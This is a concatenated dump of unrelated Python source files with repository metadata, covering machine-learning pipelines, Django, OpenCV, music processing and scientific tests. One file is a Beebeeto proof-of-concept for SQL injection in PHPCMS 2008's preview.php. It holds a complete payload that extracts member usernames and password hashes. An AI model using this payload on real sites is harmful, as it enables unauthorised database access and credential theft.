The preprocessor and formatter can also be parametrized through the prefixes 'prep' and 'frm', respectively."""
return {'clf__class_weight': (None, 'balanced'),
'clf__dual': (True, False),
'clf__C': (0.1, 1, 10)}
# ------------- standard pipelines ---------------------------------
def naive_bayes_counts():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'min_df': 1}), MultinomialNB())
def naive_bayes_tfidf():
return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), MultinomialNB())
def svm_libsvc_counts():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer(), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_libsvc_tfidf():
return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_libsvc_embed():
return pipeline(preprocessing.std_prep(), representation.text2embeddings('wiki-news'), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_sigmoid_embed():
return pipeline(preprocessing.std_prep(), representation.text2embeddings('glove'), svm.SVC(kernel='sigmoid',
gamma='scale'))
# ---------------- emotional_sm pipelines -----------------------------
# ----- BASELINE ---------------
# SVM with character 4-grams
# Ver 1 - using chargrams inside word boundaries.
# def svm_libsvc_char_4gram():
# return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char_wb', 'ngram_range':(4,4)}), svm.LinearSVC(max_iter=10000,
# dual=False, C=0.1))
# Ver 2 - using indescriminate char-4-grams.
def svm_libsvc_char_4gram():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char', 'ngram_range': (4, 4)}), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
---------------
# Deepmoji embedding pipeline )hopefully=
def deepmoji_embed:
return pipeline(preprocessing.std_prep(), representation) | [
"s.k.f.fomsgaard@student.vu.nl"
] | s.k.f.fomsgaard@student.vu.nl |
24f069fc6d342348dc51bae9ba831ef54d23aa2d | 516d8b09391fcf6f1dd95fb665a617c4982af55d | /contact/migrations/0014_remove_contactuserpayam4_tarikhjavab.py | c50800d70842dbbe09b104e763f1bc2e8dfe3c43 | [] | no_license | rezmehp/abasian-peroject | 33eb357fbef3591b9cdd7d5a73fb2c90b62fb7a7 | 5c09a4d235719933f10688454066962dae13f3f5 | refs/heads/master | 2023-04-06T21:17:12.855048 | 2021-04-13T15:16:23 | 2021-04-13T15:16:23 | 235,763,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.0.2 on 2020-03-30 15:45
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contact', '0013_auto_20200330_2013'),
]
operations = [
migrations.RemoveField(
model_name='contactuserpayam4',
name='tarikhjavab',
),
]
| [
"rezmehproject@gmail.com"
] | rezmehproject@gmail.com |
da1ab05092eedc735b9105d87a269a3ce7b359e0 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rQkriLJBc9CbfRbJb_20.py | dda0425632ec74faa830b48d2c71f225b037b0bf | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def index_of_caps(word):
liste = []
for i, j in enumerate(word):
if j.isupper() == True:
liste.append(i)
return liste
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7827d8a029673449b0405f45876d99fbc56ab1ee | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/brdlia004/question2.py | f51e12c327875c64f8d15a6444ade3e2a4b02e7c | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 960 | py | """File reformatter"""
#Liam Brodie
#BRDLIA004
#11 May 2014
print("Enter the input filename:")
infile = input("")
file = open(infile,"r")
string = file.readlines()
file.close()
print("Enter the output filename:")
outfile = input("")
linelength = eval(input("Enter line width:\n"))
newS = ""
for line in string:
if line[-1] == "\n":
newS += line[:len(line)-1]
else:
newS += line
print(newS)
def newline(newS):
if(len(newS)==0):
return ""
else:
if(newS[:2]!='\n'):
Space = newS[:linelength].rfind(" ")
if(Space>0):
#print(Space*" ")
#print(newS[:Space+1])
return newS[:Space] + "\n" + str(newline(newS[Space+1:]))
else:
return newline(newS[2:])
output = open(outfile,"w")
outtext = newline(newS)
output.write(newS)
output.close() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
4d6a87ecdb5ea24eb88b724c2eb6a34cebff36f0 | fe31c3cb21bac1cf7d06bb8dbb00ad7c09994403 | /afternoon_python/venv/Tuples_Lists_Dictionaries.py | 48f7408d63dc1905bd9303656c8225f857ddf067 | [] | no_license | bsakari/Python-Projects | 87718827daa9ff4ac16bf0855e04cadef329aa1d | 41104d8d1df84c27255f2d221ff68f219de8c84f | refs/heads/master | 2020-03-21T03:16:42.332439 | 2018-06-20T14:39:34 | 2018-06-20T14:39:34 | 138,045,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # () tuple Cannot be updated
# [] list Can be updated
# {} dictionary Cannot also be updated
name1 = ("King","mimi","wewe",9,2.5,("two",7,2.5,"yes"))
# print(name1)
# print(name1[5])
# print(name1[0:4])
# print(name1[1:])
name2 = ["King","mimi","wewe",9,2.5,("two",7,2.5,"yes")]
print(name2)
# print(name2[5])
# print(name2[0:4])
# print(name2[1:])
name2[0] = "Mfalme"
print(name2)
name3 = {"King","mimi","wewe",9,2.5,("two",7,2.5,"yes")}
print(name3)
# print(name3[5])
# print(name3[0:4])
# print(name3[1:])
| [
"sakaribenjamin@gmail.com"
] | sakaribenjamin@gmail.com |
5eff08a2a8ac3d7eb32d009fdf49681a45178538 | 6874be4a1382a7a79af829f733155cc1e33f2733 | /numstring.py | 9e352c04a1dca353cb2401c5450b88774f986d4b | [] | no_license | LawerenceLee/classes_PY | 9028604ef835aae8099658c7edfe6b509827e5ce | 440a0efff6ed4cb58a2d7b11e6cc86f49373b0af | refs/heads/master | 2021-07-10T06:34:13.537879 | 2017-10-10T22:09:24 | 2017-10-10T22:09:24 | 106,476,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | class NumString:
def __init__(self, value):
self.value = str(value)
def __str__(self):
return self.value
def __int__(self):
return int(self.value)
def __float__(self):
return float(self.value)
def __add__(self, other):
if '.' in self.value:
return float(self) + other
return int(self) + other
def __radd__(self, other):
return self + other
def __iadd__(self, other):
self.valve = self + other
return self.value | [
"lucifitz.edward@gmail.com"
] | lucifitz.edward@gmail.com |
2775ffa54c0bc23d1d71871ec34631d79c86c5d8 | ee3039b27532d09c0c435ea7b92e29c70246c66e | /opencv/learnOpencv/091-120/110-KMeans进行数据分类.py | 29e53c58acf946e676b6778afd44438e05fed344 | [] | no_license | Alvazz/fanfuhan_ML_OpenCV | e8b37acc406462b9aaca9c5e6844d1db5aa3c944 | dacfdaf87356e857d3ff18c5e0a4fd5a50855324 | refs/heads/master | 2022-04-05T06:15:31.778227 | 2020-02-07T01:40:07 | 2020-02-07T01:40:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | """
KMeans进行数据分类
"""
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
X = np.random.randint(25, 50, (25, 2))
Y = np.random.randint(60, 85, (25, 2))
pts = np.vstack((X, Y))
# 初始化数据
data = np.float32(pts)
print(data.shape)
# 定义停止条件
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# kmeans分类
ret, label, center = cv.kmeans(data, 2, None, criteria, 2, cv.KMEANS_RANDOM_CENTERS)
print(label.shape)
print(center)
# 获取不同标签的点
A = data[label.ravel() == 0]
B = data[label.ravel() == 1]
# plot the data
plt.scatter(A[:, 0], A[:, 1])
plt.scatter(B[:, 0], B[:, 1], c='r')
plt.scatter(center[:, 0], center[:, 1], s=80, c='y', marker='s')
plt.xlabel("x1")
plt.ylabel("x2")
plt.show()
cv.waitKey(0)
cv.destroyAllWindows() | [
"gitea@fake.local"
] | gitea@fake.local |
e0080d15f3124eb2541946e99066319f21c9cf29 | e20f478e1ea049e9539c4cbe5535338649651a28 | /music/process/crop.py | 4408f6423f9c18727674889669633690352de910 | [] | no_license | josephding23/RiffGAN | dde35d3f31f8e21d3a1a17ae958085dd8a752163 | f3850a22281fe8344d0db18919f3301d7bc9b55d | refs/heads/master | 2022-12-08T20:26:36.250666 | 2020-09-03T08:17:37 | 2020-09-03T08:17:37 | 269,524,888 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from dataset.grunge_library import *
from music.db_fragments.riff import *
import os
def crop_riffs():
griff_table = get_guitar_riff_table()
briff_table = get_bass_riff_table()
unit_griff_table = get_unit_guitar_riff_table()
unit_briff_table = get_unit_bass_riff_table()
for griff in griff_table.find():
measures_tonality = griff['MeasuresTonality']
path = griff['Path']
guitar_riff = GuitarRiff(path)
cropped_riffs = guitar_riff.crop_by_measure()
if not os.path.exists(path[:-4]):
os.mkdir(path[:-4])
for measure in range(guitar_riff.measures_num):
cropped = cropped_riffs[measure]
save_path = path[:-4] + '/' + str(measure) + '.mid'
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
unit_griff_table.insert_one({
'Performer': griff['Performer'],
'Album': griff['Album'],
'Song': griff['Song'],
'Path': save_path,
'Tonality': measures_tonality[measure]
})
for briff in briff_table.find():
measures_tonality = briff['MeasuresTonality']
path = briff['Path']
bass_riff = BassRiff(path)
cropped_riffs = bass_riff.crop_by_measure()
if not os.path.exists(path[:-4]):
os.mkdir(path[:-4])
for measure in range(bass_riff.measures_num):
cropped = cropped_riffs[measure]
save_path = path[:-4] + '/' + str(measure) + '.mid'
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
unit_briff_table.insert_one({
'Performer': briff['Performer'],
'Album': briff['Album'],
'Song': briff['Song'],
'Path': save_path,
'Tonality': measures_tonality[measure]
})
def test_crop():
path = 'E:/grunge_library/Soundgarden/Superunknown/03 - Fell on Black Days/RIFF/4.mid'
guitar_riff = GuitarRiff(path)
cropped_riffs = guitar_riff.crop_by_measure()
os.mkdir(path[:-4])
for measure in range(guitar_riff.measures_num):
cropped = cropped_riffs[measure]
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
if __name__ == '__main__':
crop_riffs() | [
"dingzhx@vip.qq.com"
] | dingzhx@vip.qq.com |
386d192a0ec7ee09139f82edbcdcc3242ee5d609 | 4766d241bbc736e070f79a6ae6a919a8b8bb442d | /archives/leetcode/0380. Insert Delete GetRandom O(1).py | 49e6f76ec6d3d7f929204d444413ca284bb1fee3 | [] | no_license | yangzongwu/leetcode | f7a747668b0b5606050e8a8778cc25902dd9509b | 01f2edd79a1e922bfefecad69e5f2e1ff3a479e5 | refs/heads/master | 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | '''
Design a data structure that supports all following operations in average O(1) time.
insert(val): Inserts an item val to the set if not already present.
remove(val): Removes an item val from the set if present.
getRandom: Returns a random element from current set of elements. Each element must have the same probability of being returned.
Example:
// Init an empty set.
RandomizedSet randomSet = new RandomizedSet();
// Inserts 1 to the set. Returns true as 1 was inserted successfully.
randomSet.insert(1);
// Returns false as 2 does not exist in the set.
randomSet.remove(2);
// Inserts 2 to the set, returns true. Set now contains [1,2].
randomSet.insert(2);
// getRandom should return either 1 or 2 randomly.
randomSet.getRandom();
// Removes 1 from the set, returns true. Set now contains [2].
randomSet.remove(1);
// 2 was already in the set, so return false.
randomSet.insert(2);
// Since 2 is the only number in the set, getRandom always return 2.
randomSet.getRandom();
'''
class RandomizedSet(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.datalist=[]
self.datadict={}
def insert(self, val):
"""
Inserts a value to the set. Returns true if the set did not already contain the specified element.
:type val: int
:rtype: bool
"""
if val in self.datadict:
return False
else:
self.datadict[val]=len(self.datalist)
self.datalist.append(val)
return True
def remove(self, val):
"""
Removes a value from the set. Returns true if the set contained the specified element.
:type val: int
:rtype: bool
"""
if val not in self.datalist:
return False
else:
if self.datalist[-1]==val:
self.datalist.pop()
del self.datadict[val]
else:
cur_position=self.datadict[val]
last_val=self.datalist.pop()
del self.datadict[val]
self.datadict[last_val]=cur_position
self.datalist[cur_position]=last_val
return True
def getRandom(self):
"""
Get a random element from the set.
:rtype: int
"""
return random.choice(self.datalist)
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
| [
"noreply@github.com"
] | yangzongwu.noreply@github.com |
30b607ac4c0ea0c052d4efeeabd5863ce8ad5d02 | 854394f4148e7bee8cd3c6d2a01e97ffbf772103 | /0x0A-python-inheritance/100-my_int.py | 4c939bd416117895b5cbd983bf6c85632d952eed | [] | no_license | garethbrickman/holbertonschool-higher_level_programming | cb3ccb864102d62af72b5e86d53638bd899bfabb | 05d65c6c89008cb70cbc1ada5bb9c8ed7a2733e9 | refs/heads/master | 2021-07-10T08:32:23.397388 | 2020-10-15T18:40:55 | 2020-10-15T18:40:55 | 207,379,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
"""
Class for MyInt
"""
class MyInt(int):
"""Defines base class"""
def __init__(self, int):
"""Instantiation"""
super().__init__()
self.int = int
| [
"977@holbertonschool.com"
] | 977@holbertonschool.com |
d41e07b6b493159c8e8f0b0dbd4c5a75389917d1 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0115.py | dc729f19c5425e035250f73a0c2b0ebc24b7ef11 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,141 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0115',
'name': 'PHPCMS 2008 /preview.php SQL注入漏洞 POC',
'author': '1024',
'create_date': '2014-10-25',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'PHPCMS',
'vul_version': ['2008'],
'type': 'SQL Injection',
'tag': ['PHPCMS漏洞', 'SQL注入漏洞', '/preview.php', 'php'],
'desc': 'N/A',
'references': ['http://www.wooyun.org/bugs/wooyun-2013-022112',
],
},
}
@classmethod
def verify(cls, args):
payload = ("/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2'%20and%20(select%201%20from("
"select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,username,0x3a,password,"
"0x27,0x7e)%20from%20phpcms_member%20limit%200,1))%20from%20information_schema.tables%20limit%200"
",1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)--%20a")
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
reg = re.compile("Duplicate entry '~'(.*?)'~1' for key 'group_key'")
res = reg.findall(content)
if res:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['Admin_pwd'] = res[0]
return args
exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"834430486@qq.com"
] | 834430486@qq.com |
33c640404f61f1578eabdb131983ea14b43007c2 | 93a13468fd34692ca58ec5aad8f923a5097a19a5 | /users/views.py | e2150174780cec0192b483daaa9b2f09e459b8a2 | [] | no_license | Ryanden/AirBnB-Clone | 0734735a5f1e38b2670db12a4aeb81a2ccb8dc71 | a9be3a6f2cda3c11f036c5f8a31b0c972ed77905 | refs/heads/master | 2023-04-29T07:10:10.177262 | 2021-02-16T13:48:33 | 2021-02-16T13:48:33 | 232,119,018 | 0 | 0 | null | 2023-04-21T21:14:19 | 2020-01-06T14:32:18 | Python | UTF-8 | Python | false | false | 1,532 | py | from django.views import View
from django.views.generic import FormView
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from . import forms
class LoginView(View):
def get(self, request):
form = forms.LoginForm()
return render(request, "users/login.html", {"form": form})
def post(self, request):
form = forms.LoginForm(request.POST)
if form.is_valid():
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
user = authenticate(request, username=email, password=password)
if user is not None:
login(request, user)
return redirect(reverse("core:home"))
return render(request, "users/login.html", {"form": form})
def log_out(request):
logout(request)
return redirect(reverse("core:home"))
class SignUpView(FormView):
template_name = "users/signup.html"
form_class = forms.SignUpForm
success_url = reverse_lazy("core:home")
initial = {"first_name": "test", "last_name": "guest", "email": "test@gmail.com"}
def form_valid(self, form):
form.save()
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
user = authenticate(self.request, username=email, password=password)
if user is not None:
login(self.request, user)
return super().form_valid(form)
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
b53e1d637c5aada77f90884734c81edc8fe7d932 | d5bc5ad0aa9276c661adfffe0acbe8b3211b39e4 | /torch_glow/tests/functionality/quantized_cut_in_the_middle_test.py | 5b9260be64fc135f8e6585d3c9cf1b5472c2371b | [
"Apache-2.0"
] | permissive | xw285cornell/glow | b3ec6f84be6485e5b55550c97566d11512e92167 | 90b5badcf583c0cdd880d263a687ae387bcbbb72 | refs/heads/master | 2022-12-06T05:49:09.743232 | 2020-09-04T07:34:59 | 2020-09-04T07:36:17 | 292,919,567 | 0 | 0 | Apache-2.0 | 2020-09-04T18:28:14 | 2020-09-04T18:28:13 | null | UTF-8 | Python | false | false | 2,078 | py | # isort:skip_file
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch_glow
import torch
from tests.utils import GLOW_NODE_NAME
class TestQuantizedCut(unittest.TestCase):
def test_quantized_cut(self):
"""Test cut quantized chunk in the middle."""
torch._C._jit_set_profiling_executor(False)
torch._C._jit_set_profiling_mode(False)
def fun(a, b, c, d):
q = torch.nn.quantized.Quantize(
scale=1.0 / 21, zero_point=0, dtype=torch.quint8
)
dq = torch.nn.quantized.DeQuantize()
a = q(a)
b = q(b)
c = q(c)
d = q(d)
adds = torch.ops.quantized.add(a, b, scale=1.0 / 17, zero_point=5)
adds2 = torch.ops.quantized.add(c, d, scale=1.0 / 14, zero_point=4)
res = torch.ops.quantized.add_relu(
adds, adds2, scale=1.0 / 18, zero_point=6
)
res = torch.ops.quantized.add(res, res, scale=1.0 / 13, zero_point=7)
res = dq(res)
return res
with torch.no_grad():
a = torch.randn([5, 5])
b = torch.randn([5, 5])
c = torch.randn([5, 5])
d = torch.randn([5, 5])
res_torch = fun(a, b, c, d)
torch_glow.enableFusionPass()
# Cut using blacklist functionality
blacklist = ["quantized::add_relu"]
torch_glow.setFusionBlacklist(blacklist)
traced_model = torch.jit.trace(fun, (a, b, c, d))
for node in traced_model.graph_for(a, b, c, d).nodes():
kind = node.kind()
# Make sure the blacklist is working
assert (
kind == GLOW_NODE_NAME
or kind in blacklist
or kind == "prim::Constant"
)
res_glow = traced_model(a, b, c, d)
print(res_torch)
print(res_glow)
assert torch.allclose(res_torch, res_glow)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
be81e9c26fcc8071cfffa694007f998c4194f36b | 4f0a7a6942003a928037a68ac7ba6f1afb5c30c7 | /mysite/api/serializers.py | 5f3243b80ddf585f0dd9f12f458ec4edf4c4458d | [] | no_license | UPstartDeveloper/learn-django-live | 20230fb1930420bbc9c5b12a50659a9476ab830d | 94f6eea08de321b1cc41c17571cf36bdb5ee9a7e | refs/heads/master | 2023-05-06T10:18:14.990145 | 2022-04-29T15:31:15 | 2022-04-29T15:31:15 | 216,932,883 | 0 | 0 | null | 2023-04-21T20:41:16 | 2019-10-23T00:18:09 | Python | UTF-8 | Python | false | false | 319 | py | from rest_framework.serializers import ModelSerializer
from polls.models import Question, Choice
class QuestionSerializer(ModelSerializer):
class Meta:
model = Question
fields = '__all__'
class ChoiceSerializer(ModelSerializer):
class Meta:
model = Choice
fields = '__all__'
| [
"zainr7989@gmail.com"
] | zainr7989@gmail.com |
3f6b69f20b7796bfb25dcb7c59db2b97b1d8faf1 | 1ab903cf2e439919e208db6a1ea85b95fc447eb6 | /classifier_preprocessor_quality_factor.py | 041d0557ef44914a9d67d98ee552072f9081c777 | [] | no_license | shanonentropy/photonic_thermometer_intake_module | 7156e91a7e38e9f1413f1edfe6308ac773fd9613 | d3ff7b967ae6ea072bd1edc0718fe662d67b3d07 | refs/heads/main | 2023-08-25T06:26:40.189162 | 2021-10-04T18:14:38 | 2021-10-04T18:14:38 | 413,526,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,031 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 10:38:27 2019
@author: zahmed
this program is part of the SENSOR_CLASSIFIER program's pre-processing routine
it will take in all the data from the sensor folder and display it
"""
import os
import pandas as pd
from sklearn.preprocessing import minmax_scale
from scipy import interpolate
from scipy.interpolate import splrep, sproot
import numpy as np
import matplotlib.pyplot as plt
#path to directory with the relevant files
path_dir = r'C:\Interpolation_Project\classification\fbg_classification'
#loop over the files and then create a list of file names to later iterate over
''' for each spectra we need to extract the following set of information
number of peaks
if more than one peak, peak-to-peak distace (ppd) and delta ppd
Q of the device
from the normalized spectra, skewness
and intensity of profile of the spectra
the first part is to just feed in data with profile and label and
see if the classifier works, if not, keep adding more features
so this program will just take in the data, fit it, create a dataset with
known pitch of 0.003 nm and output data ninmax scaled profile data with the
same name
'''
file_names = []
Q = []
cols = ['x', 'y']
for fname in os.listdir(path_dir):
file_names.append(fname)
print(fname)
file_path = (os.path.join(path_dir, fname))
df = pd.read_csv(file_path, sep = '\t', header = 4, engine = 'python', names =cols )
df.sort_values(by='x', ascending =True, inplace = True)
df.drop_duplicates( inplace =True)
# df.plot('x','y')
# m = df.x.count()
# s_val = 1/(m - np.sqrt(2*m))
tck = interpolate.splrep(df.x,df.y,s=0.0000001) # s =m-sqrt(2m) where m= #datapts and s is smoothness factor
x_ = np.arange (df.x.min(),df.x.max(), 0.003)
y_ = interpolate.splev(x_, tck, der=0)
# plt.plot(df['x'],df['y'])
# plt.scatter(x_,y_)
# plt.show()
HM =(np.max(y_)-np.min(y_))/2
w = splrep(x_, y_ - HM, k=3)
# print(sproot(w_j))
try:
if len(sproot(w))%2 == 0:
r1 , r2 = sproot(w)
# print(r1, r2)
FWHM = np.abs(r1 - r2)
# print('FWHM=',FWHM)
center_wavelength = r1 + FWHM/2
Q.append(center_wavelength/FWHM)
except (TypeError, ValueError):
print(fname,'error')
continue
df1 = pd.DataFrame(y_, x_)
# print(df1.head(3))
# df1['x_scale'] = minmax_scale(x_, feature_range=(0,1))
# df1['y_scale'] = minmax_scale(y_, feature_range=(0,1))
# plt.plot(df1['x_scale'], df1['y_scale'])
# df1.reset_index(inplace=True)
# df1.drop('index', axis=1, inplace=True)
# df2 = df1[['x_scale', 'y_scale']]
# print(df2.head(3))
# tmp = df2[['x_scale', 'y_scale']].transpose()
# tmp = pd.DataFrame(tmp.loc['y_scale'].T).T
# print(tmp)
# tmp.to_csv(fname)
df_q = pd.DataFrame({'filnames':file_names, 'quality_factor':Q})
df_q.to_csv('quality_factor')
| [
"noreply@github.com"
] | shanonentropy.noreply@github.com |
1500a3650158cc07514dfc13b7275ebab2abb595 | 15c04e143e7b411e3020cf68eae4d6fbefa73c4b | /idaes/apps/caprese/tests/test_nmpc_constructor_4.py | 14a73fdc3ff7cc4ad9620af5e01d0088e5bdcc5a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ryder-shallbetter/idaes-pse | 57f272506edc9d1bce851680b8e451e64d08a90c | eed7790869d2859e92f0b3dd8ea3ebe8c9f0462c | refs/heads/master | 2022-12-09T07:10:44.905376 | 2020-09-04T23:00:39 | 2020-09-04T23:00:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | ##############################################################################
# Institute for the Design of Advanced Energy Systems Process Systems
# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the
# software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia
# University Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and
# license information, respectively. Both files are also available online
# at the URL "https://github.com/IDAES/idaes-pse".
##############################################################################
"""
Test for Cappresse's module for NMPC.
"""
import pytest
from pyomo.environ import (Block, ConcreteModel, Constraint, Expression,
Set, SolverFactory, Var, value,
TransformationFactory, TerminationCondition)
from pyomo.network import Arc
from pyomo.kernel import ComponentSet
from idaes.core import (FlowsheetBlock, MaterialBalanceType, EnergyBalanceType,
MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
activated_equalities_generator)
from idaes.core.util.initialization import initialize_by_time_element
from idaes.core.util.exceptions import ConfigurationError
from idaes.generic_models.unit_models import CSTR, Mixer, MomentumMixingType
from idaes.apps.caprese import nmpc
from idaes.apps.caprese.nmpc import *
from idaes.apps.caprese.examples.cstr_model import make_model
import idaes.logger as idaeslog
__author__ = "Robert Parker"
# See if ipopt is available and set up solver
if SolverFactory('ipopt').available():
solver = SolverFactory('ipopt')
solver.options = {'tol': 1e-6,
'mu_init': 1e-8,
'bound_push': 1e-8}
else:
solver = None
def assert_categorization(model):
init_input_set = ComponentSet([model.mixer.S_inlet.flow_vol[0],
model.mixer.E_inlet.flow_vol[0]])
init_deriv_list = []
init_diff_list = []
init_fixed_list = [
model.mixer.E_inlet.temperature[0],
model.mixer.S_inlet.temperature[0],
model.cstr.control_volume.energy_holdup[0, 'aq'],
model.cstr.control_volume.material_accumulation[0, 'aq', 'E'],
]
init_ic_list = [
model.cstr.control_volume.material_holdup[0, 'aq', 'S'],
model.cstr.control_volume.material_holdup[0, 'aq', 'C'],
model.cstr.control_volume.material_holdup[0, 'aq', 'P'],
model.cstr.control_volume.volume[0],
]
init_alg_list = [
model.cstr.control_volume.volume[0],
model.cstr.outlet.flow_vol[0],
model.cstr.outlet.temperature[0],
model.cstr.inlet.flow_vol[0],
model.cstr.inlet.temperature[0],
model.mixer.outlet.flow_vol[0],
model.mixer.outlet.temperature[0],
model.cstr.control_volume.energy_accumulation[0, 'aq'],
model.cstr.control_volume.material_holdup[0, 'aq', 'E'],
]
for j in model.properties.component_list:
init_deriv_list.append(
model.cstr.control_volume.material_accumulation[0, 'aq', j])
init_diff_list.append(
model.cstr.control_volume.material_holdup[0, 'aq', j])
init_fixed_list.append(model.mixer.E_inlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.S_inlet.conc_mol[0, j])
init_alg_list.extend([
model.cstr.control_volume.properties_out[0].flow_mol_comp[j],
model.cstr.inlet.conc_mol[0, j],
model.cstr.control_volume.properties_in[0].flow_mol_comp[j],
model.cstr.control_volume.rate_reaction_generation[0, 'aq', j],
model.mixer.mixed_state[0].flow_mol_comp[j],
model.mixer.E_inlet_state[0].flow_mol_comp[j],
model.mixer.S_inlet_state[0].flow_mol_comp[j],
])
if j != 'Solvent':
init_alg_list.append(model.mixer.outlet.conc_mol[0, j])
init_alg_list.append(model.cstr.outlet.conc_mol[0, j])
else:
init_fixed_list.append(model.cstr.outlet.conc_mol[0, j])
init_fixed_list.append(model.mixer.outlet.conc_mol[0, j])
for r in model.reactions.rate_reaction_idx:
init_alg_list.extend([
model.cstr.control_volume.reactions[0].reaction_coef[r],
model.cstr.control_volume.reactions[0].reaction_rate[r],
model.cstr.control_volume.rate_reaction_extent[0, r]
])
init_deriv_set = ComponentSet(init_deriv_list)
init_diff_set = ComponentSet(init_diff_list)
init_fixed_set = ComponentSet(init_fixed_list)
init_ic_set = ComponentSet(init_ic_list)
init_alg_set = ComponentSet(init_alg_list)
assert model._NMPC_NAMESPACE.input_vars.n_vars == len(init_input_set)
for v in model._NMPC_NAMESPACE.input_vars:
assert v[0] in init_input_set
assert model._NMPC_NAMESPACE.deriv_vars.n_vars == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.deriv_vars:
assert v[0] in init_deriv_set
assert len(model._NMPC_NAMESPACE.diff_vars) == len(init_deriv_set)
for v in model._NMPC_NAMESPACE.diff_vars:
assert v[0] in init_diff_set
assert len(model._NMPC_NAMESPACE.fixed_vars) == len(init_fixed_set)
for v in model._NMPC_NAMESPACE.fixed_vars:
assert v[0] in init_fixed_set
assert len(model._NMPC_NAMESPACE.alg_vars) == len(init_alg_set)
for v in model._NMPC_NAMESPACE.alg_vars:
assert v[0] in init_alg_set
assert len(model._NMPC_NAMESPACE.ic_vars) == len(init_ic_set)
for v in model._NMPC_NAMESPACE.ic_vars:
assert v[0] in init_ic_set
